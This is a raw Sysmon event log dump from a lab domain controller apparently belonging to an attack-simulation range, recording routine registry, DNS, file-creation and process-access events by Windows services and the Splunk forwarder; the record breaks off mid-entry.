13241300x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 354300x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.746{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59151- 354300x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.746{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60976- 23542300x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.026{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=2313D5E228884E38771C53923B0754D9,SHA256=E529C5BC81C8B303489DDB297E5CD96210622B68E3CF428B20DFC94D02FEDB1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.026{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=A9A4FAF5A3E25EF77F35D927530EF9BA,SHA256=35323F1BAD6DBDAB187D1143D8E1A3489E6635A09DFC78BC2244B12927865591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.972{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7265C7E3DC453092E1A34C0C03CCAFFC,SHA256=D6C9310BEA55584C40ED8F631536EF6FDCEB344DE950E8121EBA97FABC7A2A0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FFA4B0C15636092E9C834AA4026664E9,SHA256=B58597776FC71E285816E01AFA37FDCA709FE4260C854FD749C884FE56D83B31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.928{266CAFBE-64C1-6064-9500-00000000AE01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A235A7E4B71BD97BBAB748987099CF,SHA256=47638AC655C8E043FF1D6C8AC173FEB9A395A83CDFBAB9BDBE1C5828520C49C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FA2997C748A12903B902DB4BA13A31B5,SHA256=B7E15E9BBFFAB09BC1D05F7EEC868A6865034BC1C0B75486B804D890B29094F7,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S